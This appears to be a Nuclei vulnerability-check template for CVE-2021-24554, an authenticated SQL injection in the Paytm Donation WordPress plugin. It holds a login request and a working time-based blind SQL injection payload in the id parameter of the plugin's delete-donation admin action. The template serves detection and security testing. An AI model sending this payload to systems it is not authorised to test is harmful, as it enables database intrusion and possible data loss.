45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2021-24554
|
|
|
|
info:
|
|
name: Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
The Paytm Donation Plugin WordPress plugin through 1.3.2 does not sanitise, validate or escape the id GET parameter before using it in a SQL statement when deleting donations, leading to an authenticated SQL injection issue.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad
|
|
- https://wordpress.org/plugins/wp-paytm-pay/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24554
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2021-24554
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
@timeout: 10s
|
|
GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_2>=6'
|
|
- 'status_code_2 == 200'
|
|
- 'contains(content_type_2, "text/html")'
|
|
- 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
|
|
condition: and
|